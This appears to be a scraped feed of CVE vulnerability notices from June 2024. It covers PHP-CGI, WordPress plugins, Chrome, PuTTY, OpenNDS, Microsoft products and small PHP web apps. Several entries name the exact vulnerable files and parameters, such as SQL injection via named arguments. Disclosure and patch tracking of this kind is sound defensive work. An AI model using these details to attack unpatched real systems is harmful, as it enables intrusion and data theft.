🚨 CVE-2024-4577In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.🎖@cveNotify |
|
| 2024-06-21 09:37:24 |
🚨 CVE-2024-5859The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘d’ parameter in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-21 08:37:25 |
🚨 CVE-2024-5945The WP SVG Images plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘type’ parameter in all versions up to, and including, 4.2 due to insufficient input sanitization. This makes it possible for authenticated attackers, with Author-level access and above, who have permissions to upload sanitized files, to bypass SVG sanitization and inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-21 08:37:24 |
🚨 CVE-2024-2003Local privilege escalation vulnerability allowed an attacker to misuse ESET's file operations during a restore operation from quarantine.🎖@cveNotify |
|
| 2024-06-21 07:37:26 |
🚨 CVE-2024-5639The User Profile Picture plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.6.1 via the 'rest_api_change_profile_image' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to update the profile picture of any user.🎖@cveNotify |
|
| 2024-06-21 07:37:25 |
🚨 CVE-2024-38874An issue was discovered in the events2 (aka Events 2) extension before 8.3.8 and 9.x before 9.0.6 for TYPO3. Missing access checks in the management plugin lead to an insecure direct object reference (IDOR) vulnerability with the potential to activate or delete various events for unauthenticated users.🎖@cveNotify |
|
| 2024-06-21 07:37:24 |
🚨 CVE-2024-38873An issue was discovered in the friendlycaptcha_official (aka Integration of Friendly Captcha) extension before 0.1.4 for TYPO3. The extension fails to check the requirement of the captcha field in submitted form data, allowing a remote user to bypass the captcha check. This only affects the captcha integration for the ext:form extension.🎖@cveNotify |
|
| 2024-06-21 06:37:37 |
🚨 CVE-2024-5448The PayPal Pay Now, Buy Now, Donation and Cart Buttons Shortcode WordPress plugin through 1.7 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-06-21 06:37:36 |
🚨 CVE-2024-4970The Widget Bundle WordPress plugin through 2.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-06-21 06:37:35 |
🚨 CVE-2024-4969The Widget Bundle WordPress plugin through 2.0.0 does not have CSRF checks when logging Widgets, which could allow attackers to make logged in admin enable/disable widgets via a CSRF attack🎖@cveNotify |
|
| 2024-06-21 06:37:32 |
🚨 CVE-2024-4755The Google CSE WordPress plugin through 1.0.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-06-21 06:37:31 |
🚨 CVE-2024-4477The WP Logs Book WordPress plugin through 1.0.1 does not sanitise and escape some of its log data before outputting them back in an admin dashboard, leading to an Unauthenticated Stored Cross-Site Scripting🎖@cveNotify |
|
| 2024-06-21 06:37:30 |
🚨 CVE-2024-4474The WP Logs Book WordPress plugin through 1.0.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-06-21 06:37:26 |
🚨 CVE-2024-4382The CB (legacy) WordPress plugin through 0.9.4.18 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting codes, timeframes, and bookings via CSRF attacks🎖@cveNotify |
|
| 2024-06-21 06:37:25 |
🚨 CVE-2024-4377The DOP Shortcodes WordPress plugin through 1.2 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-06-21 06:37:24 |
🚨 CVE-2021-47621ClassGraph before 4.8.112 was not resistant to XML eXternal Entity (XXE) attacks.🎖@cveNotify |
|
| 2024-06-21 05:37:24 |
🚨 CVE-2024-5756The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the db parameter in all versions up to, and including, 5.7.23 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-06-21 04:37:26 |
🚨 CVE-2024-5455The Plus Addons for Elementor Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 5.5.4 via the 'magazine_style' parameter within the Dynamic Smart Showcase widget. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-06-21 04:37:25 |
🚨 CVE-2024-6218A vulnerability, which was classified as critical, has been found in itsourcecode Vehicle Management System 1.0. Affected by this issue is some unknown functionality of the file busprofile.php. The manipulation of the argument busid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-269282 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-21 04:37:24 |
🚨 CVE-2023-4012ntpd will crash if the server is not NTS-enabled (no certificate) and it receives an NTS-enabled client request (mode 3).🎖@cveNotify |
|
| 2024-06-21 02:37:41 |
🚨 CVE-2024-6218A vulnerability, which was classified as critical, has been found in itsourcecode Vehicle Management System 1.0. Affected by this issue is some unknown functionality of the file busprofile.php. The manipulation of the argument busid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-269282 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-21 02:37:37 |
🚨 CVE-2024-6216A vulnerability classified as critical has been found in SourceCodester Food Ordering Management System 1.0. Affected is an unknown function of the file add-users.php. The manipulation of the argument contact leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269280.🎖@cveNotify |
|
| 2024-06-21 02:37:36 |
🚨 CVE-2024-5344The The Plus Addons for Elementor Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘forgoturl’ attribute within the plugin's WP Login & Register widget in all versions up to, and including, 5.5.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-21 02:37:31 |
🚨 CVE-2024-1955The Hide Dashboard Notifications plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'warning_notices_settings' function in all versions up to, and including, 1.3. This makes it possible for authenticated attackers, with contributor access and above, to modify the plugin's settings.🎖@cveNotify |
|
| 2024-06-21 02:37:30 |
🚨 CVE-2024-6103Use after free in Dawn in Google Chrome prior to 126.0.6478.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-21 02:37:26 |
🚨 CVE-2024-6101Inappropriate implementation in V8 in Google Chrome prior to 126.0.6478.114 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-21 02:37:25 |
🚨 CVE-2024-5171Integer overflow in libaom internal function img_alloc_helper can lead to heap buffer overflow. This function can be reached via 3 callers: * Calling aom_img_alloc() with a large value of the d_w, d_h, or align parameter may result in integer overflows in the calculations of buffer sizes and offsets and some fields of the returned aom_image_t struct may be invalid. * Calling aom_img_wrap() with a large value of the d_w, d_h, or align parameter may result in integer overflows in the calculations of buffer sizes and offsets and some fields of the returned aom_image_t struct may be invalid. * Calling aom_img_alloc_with_border() with a large value of the d_w, d_h, align, size_align, or border parameter may result in integer overflows in the calculations of buffer sizes and offsets and some fields of the returned aom_image_t struct may be invalid.🎖@cveNotify |
|
| 2024-06-21 02:37:24 |
🚨 CVE-2024-4418A race condition leading to a stack use-after-free flaw was found in libvirt. Due to a bad assumption in the virNetClientIOEventLoop() method, the `data` pointer to a stack-allocated virNetClientIOEventData structure ended up being used in the virNetClientIOEventFD callback while the data pointer's stack frame was concurrently being "freed" when returning from virNetClientIOEventLoop(). The 'virtproxyd' daemon can be used to trigger requests. If libvirt is configured with fine-grained access control, this issue, in theory, allows a user to escape their otherwise limited access. This flaw allows a local, unprivileged user to access virtproxyd without authenticating. Remote users would need to authenticate before they could access it.🎖@cveNotify |
|
| 2024-06-21 01:37:25 |
🚨 CVE-2024-6214A vulnerability was found in SourceCodester Food Ordering Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file add-item.php. The manipulation of the argument price leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-269278 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-21 01:37:24 |
🚨 CVE-2024-6213A vulnerability was found in SourceCodester Food Ordering Management System up to 1.0. It has been classified as critical. This affects an unknown part of the file login.php of the component Login Panel. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269277 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-20 23:37:29 |
🚨 CVE-2024-38361Spicedb is an Open Source, Google Zanzibar-inspired permissions database to enable fine-grained authorization for customer applications. Use of an exclusion under an arrow that has multiple resources may resolve to `NO_PERMISSION` when permission is expected. If the resource exists under *multiple* folders and the user has access to view more than a single folder, SpiceDB may report the user does not have access due to a failure in the exclusion dispatcher to request that *all* the folders in which the user is a member be returned. Permission is returned as `NO_PERMISSION` when `PERMISSION` is expected on the `CheckPermission` API. This issue has been addressed in version 1.33.1. All users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-06-20 23:37:26 |
🚨 CVE-2024-38359The Lightning Network Daemon (lnd) - is a complete implementation of a Lightning Network node. A parsing vulnerability in lnd's onion processing logic and lead to a DoS vector due to excessive memory allocation. The issue was patched in lnd v0.17.0. Users should update to a version > v0.17.0 to be protected. Users unable to upgrade may set the `--rejecthtlc` CLI flag and also disable forwarding on channels via the `UpdateChanPolicyCommand`, or disable listening on a public network interface via the `--nolisten` flag as a mitigation.🎖@cveNotify |
|
| 2024-06-20 23:37:25 |
🚨 CVE-2024-32943An attacker may be able to cause a denial-of-service condition by sending many SSH packets repeatedly.🎖@cveNotify |
|
| 2024-06-20 23:37:24 |
🚨 CVE-2024-2182A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.🎖@cveNotify |
|
| 2024-06-20 22:37:25 |
🚨 CVE-2024-5746A Server-Side Request Forgery vulnerability was identified in GitHub Enterprise Server that allowed an attacker with the Site Administrator role to gain arbitrary code execution capability on the GitHub Enterprise Server instance. Exploitation required authenticated access to GitHub Enterprise Server as a user with the Site Administrator role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.13 and was fixed in versions 3.12.5, 3.11.11, 3.10.13, and 3.9.16. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2024-06-20 22:37:24 |
🚨 CVE-2024-37183Plain text credentials and session ID can be captured with a network sniffer.🎖@cveNotify |
|
| 2024-06-20 21:37:25 |
🚨 CVE-2024-30848Cross-site scripting (XSS) vulnerability in SilverSky E-mail service version 5.0.3126 allows remote attackers to inject arbitrary web script or HTML via the version parameter.🎖@cveNotify |
|
| 2024-06-20 21:37:24 |
🚨 CVE-2024-29390Daily Expenses Management System version 1.0, developed by PHP Gurukul, contains a time-based blind SQL injection vulnerability in the 'add-expense.php' page. An attacker can exploit the 'item' parameter in a POST request to execute arbitrary SQL commands in the backend database. This can be done by injecting specially crafted SQL queries that make the database perform time-consuming operations, thereby confirming the presence of the SQL injection vulnerability based on the delay in the server's response.🎖@cveNotify |
|
| 2024-06-20 20:37:45 |
🚨 CVE-2024-6154Parallels Desktop Toolgate Heap-based Buffer Overflow Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability.The specific flaw exists within the Toolgate component. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the current user on the host system. Was ZDI-CAN-20450.🎖@cveNotify |
|
| 2024-06-20 20:37:44 |
🚨 CVE-2024-6147Poly Plantronics Hub Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Poly Plantronics Hub. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the Spokes Update Service. By creating a symbolic link, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18271.🎖@cveNotify |
|
| 2024-06-20 20:37:43 |
🚨 CVE-2024-38082Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-06-20 20:37:39 |
🚨 CVE-2024-6195A vulnerability has been found in itsourcecode Tailoring Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file orderadd.php. The manipulation of the argument customer leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269167.🎖@cveNotify |
|
| 2024-06-20 20:37:38 |
🚨 CVE-2024-5383A vulnerability classified as problematic has been found in lakernote EasyAdmin up to 20240324. This affects an unknown part of the file /sys/file/upload. The manipulation of the argument file leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The identifier of the patch is 9c8a836ace17a93c45e5ad52a2340788b7795030. It is recommended to apply a patch to fix this issue. The identifier VDB-266301 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-20 20:37:37 |
🚨 CVE-2024-5045A vulnerability was found in SourceCodester Online Birth Certificate Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin. The manipulation leads to files or directories accessible. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264742 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-20 20:37:33 |
🚨 CVE-2024-4922A vulnerability, which was classified as problematic, was found in SourceCodester Simple Image Stack Website 1.0. This affects an unknown part. The manipulation of the argument page leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264459.🎖@cveNotify |
|
| 2024-06-20 20:37:32 |
🚨 CVE-2024-4719A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /model/delete_record.php. The manipulation of the argument page leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263797 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-20 20:37:31 |
🚨 CVE-2024-4688A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/conversation_history_admin.php. The manipulation of the argument conversation_id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263629 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-20 20:37:30 |
🚨 CVE-2024-4686A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /view/emarks_range_grade_update_form.php. The manipulation of the argument grade leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263627.🎖@cveNotify |
|
| 2024-06-20 20:37:27 |
🚨 CVE-2024-4651A vulnerability, which was classified as problematic, has been found in Campcodes Complete Web-Based School Management System 1.0. This issue affects some unknown processing of the file /view/student_attendance_history1.php. The manipulation of the argument year leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263495.🎖@cveNotify |
|
| 2024-06-20 20:37:26 |
🚨 CVE-2024-4593A vulnerability, which was classified as problematic, has been found in DedeCMS 5.7. This issue affects some unknown processing of the file /src/dede/sys_multiserv.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263315. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-20 20:37:25 |
🚨 CVE-2024-3040A vulnerability, which was classified as critical, was found in Netentsec NS-ASG Application Security Gateway 6.3. This affects an unknown part of the file /admin/list_crl_conf. The manipulation of the argument CRLId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258429 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-20 20:37:24 |
🚨 CVE-2023-23127In Connectwise Control 22.8.10013.8329, the login page does not implement HSTS headers therefore not enforcing HTTPS. NOTE: the vendor's position is that, by design, this is controlled by a configuration option in which a customer can choose to use HTTP (rather than HTTPS) during troubleshooting.🎖@cveNotify |
|
| 2024-06-20 19:37:26 |
🚨 CVE-2024-6187A vulnerability has been found in Ruijie RG-UAC 1.0 and classified as critical. This vulnerability affects unknown code of the file /view/vpn/autovpn/sub_commit.php. The manipulation of the argument key leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-269158 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-20 19:37:25 |
🚨 CVE-2024-31497In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an attacker to recover a user's NIST P-521 secret key via a quick attack in approximately 60 signatures. This is especially important in a scenario where an adversary is able to read messages signed by PuTTY or Pageant. The required set of signed messages may be publicly readable because they are stored in a public Git service that supports use of SSH for commit signing, and the signatures were made by Pageant through an agent-forwarding mechanism. In other words, an adversary may already have enough signature information to compromise a victim's private key, even if there is no further use of vulnerable PuTTY versions. After a key compromise, an adversary may be able to conduct supply-chain attacks on software maintained in Git. A second, independent scenario is that the adversary is an operator of an SSH server to which the victim authenticates (for remote login or file copy), even though this server is not fully trusted by the victim, and the victim uses the same private key for SSH connections to other services operated by other entities. Here, the rogue server operator (who would otherwise have no way to determine the victim's private key) can derive the victim's private key, and then use it for unauthorized access to those other services. If the other services include Git services, then again it may be possible to conduct supply-chain attacks on software maintained in Git. This also affects, for example, FileZilla before 3.67.0, WinSCP before 6.3.3, TortoiseGit before 2.15.0.1, and TortoiseSVN through 1.14.6.🎖@cveNotify |
|
| 2024-06-20 18:37:45 |
🚨 CVE-2024-37352There is a cross-site scripting vulnerability in themanagement UI of Absolute Secure Access prior to version 13.06 that allowsattackers with system administrator permissions to interfere with other systemadministrators’ use of the management UI when the second administrator accessesthe vulnerable page. The scope is unchanged, there is no loss ofconfidentiality. Impact to system integrity is high, impact to systemavailability is none.🎖@cveNotify |
|
| 2024-06-20 18:37:44 |
🚨 CVE-2024-37350There is a cross-site scripting vulnerability in the policymanagement UI of Absolute Secure Access prior to version 13.06. Attackers caninterfere with a system administrator’s use of the policy management UI whenthe attacker convinces the victim administrator to follow a crafted link to thevulnerable component while the attacking administrator is authenticated to theconsole. The scope is unchanged, there is no loss of confidentiality. Impact tosystem integrity is high, impact to system availability is none.🎖@cveNotify |
|
| 2024-06-20 18:37:43 |
🚨 CVE-2024-37349There is a cross-site scripting vulnerability in themanagement UI of Absolute Secure Access prior to version 13.06. Attackers withsystem administrator permissions can interfere with other systemadministrator’s use of the management UI when the victim administrator editsthe same management object. This vulnerability is distinct from CVE-2024-37348 andCVE-2024-37351. The scope is unchanged, there is no loss of confidentiality. Impactto system integrity is high, impact to system availability is none.🎖@cveNotify |
|
| 2024-06-20 18:37:39 |
🚨 CVE-2024-30096Windows Cryptographic Services Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-06-20 18:37:38 |
🚨 CVE-2024-30095Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-20 18:37:37 |
🚨 CVE-2024-30093Windows Storage Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-20 18:37:36 |
🚨 CVE-2024-30090Microsoft Streaming Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-20 18:37:32 |
🚨 CVE-2023-41102An issue was discovered in the captive portal in OpenNDS before version 10.1.3. It has multiple memory leaks due to not freeing up allocated memory. This may lead to a Denial-of-Service condition due to the consumption of all available memory. Affected OpenNDS before version 10.1.3 fixed in OpenWrt master and OpenWrt 23.05 on 23. November by updating OpenNDS to version 10.2.0.🎖@cveNotify |
|
| 2024-06-20 18:37:31 |
🚨 CVE-2023-38322An issue was discovered in OpenNDS Captive Portal before version 10.1.2. It has a do_binauth NULL pointer dereference that be triggered with a crafted GET HTTP request with a missing User-Agent HTTP header. Triggering this issue results in crashing OpenNDS (a Denial-of-Service condition). The issue occurs when the client is about to be authenticated, and can be triggered only when the BinAuth option is set. Affected OpenNDS Captive Portal before version 10.1.2 fixed in OpenWrt master, OpenWrt 23.05 and OpenWrt 22.03 on 28. August 2023 by updating OpenNDS to version 10.1.3.🎖@cveNotify |
|
| 2024-06-20 18:37:27 |
🚨 CVE-2023-38320An issue was discovered in OpenNDS Captive Portal before version 10.1.2. It has a show_preauthpage NULL pointer dereference that can be triggered with a crafted GET HTTP with a missing User-Agent header. Triggering this issue results in crashing OpenNDS (a Denial-of-Service condition). This problem was fixed in OpenWrt master, OpenWrt 23.05 and OpenWrt 22.03 on 28. August 2023 by updating OpenNDS to version 10.1.3.🎖@cveNotify |
|
| 2024-06-20 18:37:26 |
🚨 CVE-2023-38316An issue was discovered in OpenNDS Captive Portal before version 10.1.2. When the custom unescape callback is enabled, attackers can execute arbitrary OS commands by inserting them into the URL portion of HTTP GET requests. Affected OpenNDS Captive Portal before version 10.1.2 fixed in OpenWrt master, OpenWrt 23.05 and OpenWrt 22.03 on 28. August 2023 by updating OpenNDS to version 10.1.3.🎖@cveNotify |
|
| 2024-06-20 18:37:25 |
🚨 CVE-2023-38313An issue was discovered in OpenNDS Captive Portal before 10.1.2. it has a do_binauth NULL pointer dereference that can be triggered with a crafted GET HTTP request with a missing client redirect query string parameter. Triggering this issue results in crashing openNDS (a Denial-of-Service condition). The issue occurs when the client is about to be authenticated, and can be triggered only when the BinAuth option is set. Affected OpenNDS Captive Portal before version 10.1.2 fixed infixed in OpenWrt master, OpenWrt 23.05 and OpenWrt 22.03 on28. August 2023 by updating OpenNDS to version 10.1.3.🎖@cveNotify |
|
| 2024-06-20 18:07:25 |
🚨 CVE-2024-30099Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-20 18:07:24 |
🚨 CVE-2024-30097Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-20 17:37:44 |
🚨 CVE-2024-37626A command injection issue in TOTOLINK A6000R V1.0.1-B20201211.2000 firmware allows a remote attacker to execute arbitrary code via the iface parameter in the vif_enable function.🎖@cveNotify |
|
| 2024-06-20 17:37:43 |
🚨 CVE-2024-37347There is a cross-site scripting vulnerability in the poolconfiguration component of the management UI of Absolute Secure Access prior to13.06. Attackers with system administrator permissions can pass a limitedlength script to be run by another administrator. The scope is unchanged, thereis no loss of confidentiality. Impact to system integrity is high, impact tosystem availability is none.🎖@cveNotify |
|
| 2024-06-20 17:37:42 |
🚨 CVE-2024-37345There is a cross-site scripting vulnerability in the SecureAccess administrative UI of Absolute Secure Access prior to version 13.06.Attackers can pass a limited-length script to the administrative UI which isthen stored where an administrator can access it. The scope is unchanged, thereis no loss of confidentiality. Impact to system availability is none, impact tosystem integrity is high🎖@cveNotify |
|
| 2024-06-20 17:37:38 |
🚨 CVE-2024-37344There is a cross-site scripting vulnerability in the Policymanagement UI of Absolute Secure Access prior to version 13.06. Attackers withsystem administrator permissions can interfere with another systemadministrator’s use of the policy management UI when the administrators areediting the same policy object. The scope is unchanged, there is no loss ofconfidentiality. Impact to system availability is none, impact to systemintegrity is high.🎖@cveNotify |
|
| 2024-06-20 17:37:37 |
🚨 CVE-2024-28397An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.🎖@cveNotify |
|
| 2024-06-20 17:37:36 |
🚨 CVE-2022-45929Northern.tech Mender 3.3.x before 3.3.2, 3.5.x before 3.5.0, and 3.6.x before 3.6.0 has Incorrect Access Control and allows users to change their roles and could allow privilege escalation from a low-privileged read-only user to a high-privileged user.🎖@cveNotify |
|
| 2024-06-20 17:37:32 |
🚨 CVE-2024-35253Microsoft Azure File Sync Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-20 17:37:31 |
🚨 CVE-2024-35250Windows Kernel-Mode Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-20 17:37:30 |
🚨 CVE-2024-30104Microsoft Office Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-20 17:37:26 |
🚨 CVE-2024-30102Microsoft Office Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-20 17:37:25 |
🚨 CVE-2024-30101Microsoft Office Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-20 17:07:25 |
🚨 CVE-2024-35249Microsoft Dynamics 365 Business Central Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-20 17:07:24 |
🚨 CVE-2024-35248Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-20 16:37:31 |
🚨 CVE-2024-6182A vulnerability was found in LabVantage LIMS 2017. It has been rated as problematic. This issue affects some unknown processing of the file /labvantage/rc?command=page&page=LV_ViewSampleSpec&oosonly=Y&_sdialog=Y. The manipulation of the argument sdcid/keyid1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269153 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-20 16:37:30 |
🚨 CVE-2024-35263Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-06-20 16:37:26 |
🚨 CVE-2024-35255Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-20 16:37:25 |
🚨 CVE-2024-3766A vulnerability, which was classified as problematic, has been found in slowlyo OwlAdmin up to 3.5.7. Affected by this issue is some unknown functionality of the file /admin-api/upload_image of the component Image File Upload. The manipulation of the argument file leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-260606 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-20 16:37:24 |
🚨 CVE-2023-41101An issue was discovered in the captive portal in OpenNDS before version 10.1.3. get_query in http_microhttpd.c does not validate the length of the query string of GET requests. This leads to a stack-based buffer overflow in versions 9.x and earlier, and to a heap-based buffer overflow in versions 10.x and later. Attackers may exploit the issue to crash OpenNDS (Denial-of-Service condition) or to inject and execute arbitrary bytecode (Remote Code Execution). Affected OpenNDS before version 10.1.3 fixed in OpenWrt master and OpenWrt 23.05 on 23. November by updating OpenNDS to version 10.2.0.🎖@cveNotify |
|
| 2024-06-20 16:07:36 |
🚨 CVE-2024-36226Adobe Experience Manager versions 6.5.20 and earlier are affected by an Improper Input Validation vulnerability that could result in a security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and affect the integrity of the page. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2024-06-20 16:07:32 |
🚨 CVE-2024-26126Adobe Experience Manager versions 6.5.20 and earlier are affected by an Improper Input Validation vulnerability that could result in a security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and affect the integrity of the page. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2024-06-20 16:07:31 |
🚨 CVE-2024-5830Type Confusion in V8 in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-20 15:37:32 |
🚨 CVE-2024-6102Out of bounds memory access in Dawn in Google Chrome prior to 126.0.6478.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-20 15:37:31 |
🚨 CVE-2024-6100Type Confusion in V8 in Google Chrome prior to 126.0.6478.114 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-20 15:37:27 |
🚨 CVE-2024-5836Inappropriate Implementation in DevTools in Google Chrome prior to 126.0.6478.54 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code via a crafted Chrome Extension. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-20 15:37:26 |
